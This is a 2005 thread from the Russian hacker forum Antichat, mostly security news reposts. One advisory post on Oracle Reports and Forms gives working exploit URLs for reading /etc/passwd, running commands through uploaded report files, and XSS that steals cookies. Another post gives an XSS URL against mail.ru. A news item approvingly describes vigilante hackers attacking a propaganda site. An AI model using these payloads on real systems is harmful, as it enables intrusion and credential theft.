Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Множественные уязвимости в продуктах Oracle |

20.07.2005, 12:38
|
|
Banned
Регистрация: 30.06.2005
Сообщений: 236
Провел на форуме: 333859
Репутация:
53
|
|
Множественные уязвимости в продуктах Oracle
Обнаруженные уязвимости позволяют удаленному пользователю прочитать и перезаписать файлы, выполнить произвольные команды на целевой системе и произвести XSS нападение.
1. Уязвимость при обработке параметра DESFORMAT в Oracle Reports позволяет удаленному пользователю просмотреть произвольные файлы на системе, используя абсолютный путь к файлу. Пример:
http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd
2. Уязвимость в Oracle Reports при обработке исполняемых файлов отчетов (*.rep, *.rdf) позволяет злоумышленнику, с правами загрузки файлов на сервер приложений, выполнить произвольные команды на системе, прочитать и перезаписать произвольные файлы с привилегиями процесса. Злоумышленник может указать абсолютный путь к файлу и выполнить отчет в любой директории на сервере.
Сценарий атаки:
1. Злоумышленник создает или модифицирует обычный отчет путем добавления вызова ORA_FFI для запуска команд или вызова TEXT_IO для создания и чтения файлов сервере прилжений.
2. Злоумышленник генерирует исполняемый файл отчета (например hacker.rdf или hacker.rep) для целевой системы.
3. Копирует исполняемый файл отчета на сервер приложений с помощью подручных средств (SMB, FTP Webdav, NFS…).
4. Выполняет отчет следующим образом:
http://myserver.com:7779/reports/rwservlet? server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
3. Уязвимость существует при обработке параметра DESNAME в Oracle Reports. Удаленный пользователь может с помощью специально сформированного URL перезаписать произвольный файл на системе с привилегиями процесса.
4. Уязвимость при выполнении форм в Oracle Forms Services позволяет злоумышленнику выполнить произвольные команды на системе.
Сценарий атаки:
1. Злоумышленник создает обычную форму и добавляет к ней следующие строки:
"WHEN_NEW_FORM_INSTANCE"-Trigger
Host('ls > forms_is_unsecure.txt' , NO_SCREEN);
2. Злоумышленник генерирует исполняемый код формы (например, hacker.fmx) для целевой платформе.
3. Копирует бинарник формы на сервер приложений.
4. Запускает отчет следующим образом:
http://myserver.com:7779/forms90/f90...doe/hacker.fmx
или
http://myserver.com:7779/forms90/f90...tmp/hacker.fmx
5. Уязвимость в Oracle Reports при обработке параметра customize позволяет злоумышленнику просмотреть произвольный файл на целевой системе, указав абсолютный путь к нему. Пример:
http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=cache+desformat=xml+CUSTOMIZE=
/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml
6. Межсайтовый скриптинг возможен в Oracle Reports 9.0.2 при обработке входных данных в параметре customize. Злоумышленник может выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://myserver:7778/reports/rwservlet/showenv?
server=reptest&debug=<script>alert(document.cookie );</script>
http://myserver:7778/reports/rwservlet/parsequery?
server=myserver&test=<script>alert(document.cookie );</script>
http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=localFile+desformat=delimited
+desname=FILE:+CELLWRAPPER=*+
delimiter=<script>alert(document.cookie);</script>
http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=localFile+desformat=delimited
+desname=FILE:+CELLWRAPPER=<script>
alert(document.cookie);</script>
URL производителя: oracle.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Источник: http://www.red-database-security.com
|
|
|
"Правильным" хакерам будут официально платить |

27.07.2005, 16:16
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
"Правильным" хакерам будут официально платить
Компания Tipping Point - подразделение 3Com, специализирующееся на компьютерной безопасности, - разработала систему вознаграждений, в рамках которой компьютерные специалисты (в том числе хакеры) смогут получать деньги за поиск уязвимостей в программах различных производителей.
Система получила название Zero Day Initiative, она будет официально представлена на конференции Black Hat в Лас-Вегасе, которая пройдет 27 и 28 июля. Предполагается, что в системе будут регистрироваться компании, желающие проверить свои продукты, и квалифицированные специалисты, которые будут заниматься непосредственно тестированием. Производители будут отчислять средства, которые будут распределяться между тестерами.
© klerk.ru
|
|
|
Вирусная десятка за июль от Panda Software |

04.08.2005, 08:38
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
Вирусная десятка за июль от Panda Software
По данным компании Panda Software, в июле наибольший ущерб компьютерам пользователей был нанесен скриптом FTP-функций SDBot. Эти данные были получены на базе статистики использования онлайнового антивирусного сервиса Panda ActiveScan.
В целом, список наиболее распространенных вирусов не особенно изменился. Единственное исключение - смена лидера. Впервые за три месяца вредоносный код Mhtredir.gen сдал свои позиции. Занимающий теперь первую строчку рейтинга скрипт позволяет некоторым версиям SDBot скачивать червя по FTP, если им удается использовать системные уязвимости, такие как LSASS или RPC-DCOM.
Четвертое место занимает семейство Gaobot - это черви с функциями бота, переполняющие интернет несколькими сотнями версий. Для создателей такой вредоносной программы польза очевидна: они могут создавать сети ботов для выполнения ряда действий, включая рассылку спама или проведение координированных атак.
В рейтинге присутствует вирус Smitfraud, нацеленный исключительно на получение финансовой выгоды: он является частью одноименной рекламной программы, которая, среди прочего, мошенническим способом пытается заставить пользователей купить якобы антишпионскую программу.
Вместе с версией BS Mhtredir занимает два места в хит-параде июля. Этот тип вредоносного ПО эксплуатирует незакрытые бреши безопасности компьютеров. Netsky.P, также вошедший в десятку, использует уязвимость, позволяющую запускать почтовые вложения просто при открытии в панели предпросмотра.
Полностью июльская десятка Panda Software выглядит следующим образом:
W32/Sdbot.ftp - 2,47%
Exploit/Mhtredir.gen - 2,08%
W32/Netsky.P.worm - 1,94%
W32/Gaobot.gen.worm - 1,56%
Trj/Qhost.gen - 1,43%
VBS/Psyme.C - 1,04%
Exploit/Mhtredir.BS - 0,95%
W32/Smitfraud.B - 0,81%
Trj/Downloader.DEW - 0,75%
W32/Parite.B - 0,75%
В дополнение к рейтингу вирусов компания составила отдельный рейтинг заражений шпионским ПО. Как и раньше, наиболее часто обнаруживаемой шпионской программой остается ISTbar. Ее основной особенностью является то, что она служит точкой входа для других подобных вредоносных программ, таких как шпионское, рекламное ПО и дозвонщики. Среди "новичков" можно отметить YourSiteBar, шпионскую программу, которая собирает пользовательскую информацию и отправляет ее рекламным интернет-компаниям. Рейтинг выглядит так:
Spyware/ISTbar - 3,32%
Spyware/Cydoor - 3,01%
Spyware/XXXToolbar- 2,79%
Spyware/New.net - 2,54%
Spyware/BetterInet - 1,13%
Spyware/Dyfuca - 0,91%
Spyware/YourSiteBar - 0,75%
Spyware/Petro-Line - 0,67%
Spyware/Altnet- 0,57%
Spyware/BargainBuddy - 0,51%
Источник: "Домашний пк"
|
|
|
Вирусная двадцатка Касперского за июль |

04.08.2005, 08:50
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
Вирусная двадцатка Касперского за июль
Email-Worm.Win32.NetSky.q 14,67%
Net-Worm.Win32.Mytob.c 13,58%
Email-Worm.Win32.Zafi.b 8,01%
Email-Worm.Win32.Zafi.d 6,54%
Net-Worm.Win32.Mytob.be 6,12%
Net-Worm.Win32.Mytob.bk 6,07%
Email-Worm.Win32.NetSky.aa 4,41%
Net-Worm.Win32.Mytob.bt 2,65%
Email-Worm.Win32.NetSky.b 2,52%
Net-Worm.Win32.Mytob.bi 2,11%
Net-Worm.Win32.Mytob.au 1,85%
Email-Worm.Win32.NetSky.d 1,73%
Net-Worm.Win32.Mytob.u 1,62%
Net-Worm.Win32.Mytob.ar 1,59%
Email-Worm.Win32.LovGate.w 1,59%
Net-Worm.Win32.Mytob.q 1,37%
Net-Worm.Win32.Mytob.t 1,30%
Email-Worm.Win32.Mydoom.l 1,20%
Email-Worm.Win32.Mydoom.m 1,17%
Email-Worm.Win32.Bagle.ah 1,04%
Источник: компулента.ру
|
|
|

07.08.2005, 12:52
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
XSS в сервисе mail.ru
http://love.mail.ru/my/login.phtml?oid=0&photo_oid=0&login_action=login&t curl=&login=asd">[script]alert();[/script]
Источник: http://antiox.net.ru/
|
|
|
Хакер получил информацию о 61 тыс. студентов |

11.08.2005, 16:09
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
Хакер получил информацию о 61 тыс. студентов
Представители калифорнийского Университета Сонома обнародовали информацию о том, что некому хакеру удалось получить доступ к компьютерной базе данных университета. Таким образом, злоумышленнику удалось похитить конфиденциальную информацию о 61 тыс. студентов университета.
В ходе работ было установлено, что хакер получил доступ к семи компьютерам, которые и содержали важные файлы. При этом злоумышленник использовал "невыявленные ранее уязвимости в операционной системе ". Взлом сети произошел в июле текущего года. Более подробная информация о том, какого рода информация попала в руки к хакеру, пока не разглашается, однако абсолютно точно известно, что в распоряжении злоумышленника оказались файлы с информацией о студентах за период с 1995 по 2002 год с их именами и номерами социального страхования.
По информации университета все пострадавшие будут в обязательном порядке проинформированы о произошедшем.
CNews
|
|
|
Уязвимость в Invision Power Board |

11.08.2005, 16:10
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
Уязвимость в Invision Power Board
По сообщению Secunia, некий V[i]RuS обнаружил уязвимость в форумах Invision Power Board 1.0.3/2.0.4 (и возможно других версиях). Уязвимость заключается в возможности присоединять HTML и TXT файлы к соообщениям форума, которые содержат скрипты JavaScript. При открытии таких файлов в браузере, на компьютере пользователя происходит отображение страницы и соответственно выполнение скриптов JavaScript. Для решения этой проблемы, рекомендуется запретить прикрепление HTML и TXT файлов к сообщению форума.
http://secunia.com
|
|
|

21.08.2005, 17:44
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
Саранский хакер
В Мордовии задержан хакер, взломавший один из сайтов Сбербанка России. Как сообщил сегодня ИТАР-ТАСС, начальник отдела по борьбе с преступлениями в сфере высоких технологий Алексей Ширманов, работу сайта нарушил 17-летний школьник, 11-классник одной из пригородных школ Саранска.
Он умудрился "заразить" не только сайт Сбербанка России, но, через него, и десятки других пользователей интернета во многих регионах России. Один из них обратился за помощью в ГУВД Москвы, а уж затем московская милиция обратилась за помощью к коллегам из Мордовии.
По словам Ширманова, количество преступлений в сфере высоких технологий растет очень высокими темпами. Так, если в 2004 году их было зарегистрировано 98, то только в первом полугодии 2005 года - более полутора сотен.
"Деятельность хакеров часто удивляет своей вредной бессмысленностью,- сказал Ширманов,- уж лучше бы деньги с помощью интернета зарабатывали". Между тем, по его словам, неизбежная судимость, даже условная, в дальнейшем может стать серьезным препятствием в судьбе молодого человека.
Источник: хз
|
|
|
Суд над не соверщенно летним хакером |

31.08.2005, 10:03
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
Суд над не соверщенно летним хакером
В США подросток приговорён к тюремному заключению сроком на 5 лет за организацию DoS-атак на компьютеры двух фирм, занимающихся продажей спортивной одежды в интернете.
Семнадцатилетний хакер Джэсмин Синх (Jasmine Singh) использовал компьютерный вирус, чтобы создать сеть из нескольких тысяч так называемых компьютеров-зомби и нанести удар по намеченным жертвам. Пострадавшие фирмы - Jersey-Joe.com и Distant Replays оценивают общий ущерб примерно в $1,5 млн.
Юного злоумышленника удалось найти по следу, который оставлял его вирус на захваченных компьютерах. Вирус высылал информацию пользователю, пользующемуся псевдонимом "Pherk". Удалось обнаружить и почтовый адрес с подобным именем, зарегистрированный на имя школьника из Нью-Джерси Джэсмина Синха.
Подросток признал свою вину и заявил, что его друг, занимающийся продажей спортивных товаров в интернете, попросил его нанести удар по конкурентам в обмен на три пары кроссовок и часы. Заказчик преступления восемнадцатилетний Джейсон Арабо также был вскоре задержан.
Первоначально Синху были предъявлены два обвинения первой степени, грозящие сроком заключения до 20 лет каждое. Затем они были заменены обвинениями второй степени, в результате чего и был вынесен относительно несуровый приговор. Также хакеру предстоит выплатить пострадавшим фирмам компенсацию в $35 тыс.
Источник:CNews.ru
|
|
|
Русскоговорящее хак сообщество объявляет войну террористам |

19.10.2005, 00:30
|
|
junior admin
Регистрация: 15.11.2004
Сообщений: 105
Провел на форуме: 623414
Репутация:
12
|
|
Русскоговорящее хак сообщество объявляет войну террористам
19 октября, 2005
В Интернете появился сайт, который призывает всех хакеров принять участие в “уничтожении ресурсов, ведущих террористическую пропаганду”. В настоящий момент усилиями неизвестных хакеров уже закрыты форум портала Кавказ-центр и блокирован счет сбора средств в платежной системе США.
На сайте peace4peace.com неизвестная группа единомышленников организовала собственный фронт борьбы с печально известным сайтом "Кавказ-центра". Как написано на сайте “Наша задача уничтожать ресурсы, ведущие террористическую пропаганду и преднамеренно искажающие факты. Законы военного времени развязывают нам руки, и мы будем использовать все доступные нам методы и средства! Наша цель - показать то, что мы едины в борьбе против террористов. Мы всего лишь участники хак-сообщества самый разных специальностей, большинство из нас уже давно находится по ту сторону закона, но это не мешает нам быть патриотами, ратующими за мир во всем мире”. По словам авторов сайта “На сегодняшний день начата крупномасштабная операция, мы вложили личного материала и оборудования стоимостью в десятки тысяч долларов, чтобы противостоять терроризму в интернете, выработали общую политику борьбы и избрали единое руководство”.
В настоящий момент уже закрыты форум портала Кавказ-центр и блокирован счет сбора средств в платежной системе США. Авторы сайта обещают длительную войну, пока не будут “уничтожены ресурсы, ведущие террористическую пропаганду и преднамеренно искажающие факты”.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|